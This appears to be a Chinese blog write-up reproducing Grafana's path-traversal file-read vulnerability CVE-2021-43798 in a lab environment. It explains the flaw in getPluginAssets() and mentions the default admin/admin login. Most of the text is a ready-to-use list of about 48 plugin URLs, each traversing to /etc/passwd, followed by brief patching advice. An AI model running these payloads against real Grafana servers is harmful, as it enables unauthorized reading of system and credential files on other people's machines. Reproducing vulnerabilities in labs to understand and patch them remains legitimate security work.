Grafana任意文件读取漏洞(CVE-2021-43798)复现

Grafana任意文件读取漏洞(CVE-2021-43798)复现

漏洞描述:

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告
Grafana 的读取文件接口存在未授权,且未对文件地址进行过滤,导致可以目录穿越/../../../../../../../../../os filepath实现系统任意文件读取

漏洞影响范围:

Grafana 8.0.0 - 8.3.0

环境搭建:

最好自己搭建,在线环境不太好用

采用vulfocus靶场  地址

漏洞复现:

问题出在pkg/api/api.go中的 getPluginAssets()函数

通过pluginid得到插件信息,如果插件不存在就返回404;
通过requestedFile := filepath.Clean(web.Params(c.Req)["*"])文件path,并且通过了clean函数的处理,但这里没有处理彻底,导致可以通过../../../../../方式绕过,pluginFilePath := filepath.Join(plugin.PluginDir, requestedFile)拼接插件目录。

poc:/public/plugins/{插件名字}/../../../../../../../../etc/passwd

GitHub地址

打开网页,账户密码默认:admin/admin

简单判断是否存在:/public/plugins/a/a 显示 404 plugin not found 400 可能就是中间件问题

Grafana任意文件读取漏洞(CVE-2021-43798)复现_第1张图片

受影响的plugins(插件) 

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

成功读取

Grafana任意文件读取漏洞(CVE-2021-43798)复现_第2张图片

修复建议

升级到最新版本
若无法及时更新,可设置Grafana仅对可信地址开放,即白名单访问;禁止系统对公网开放。

你可能感兴趣的:(漏洞,安全,web安全,Grafana)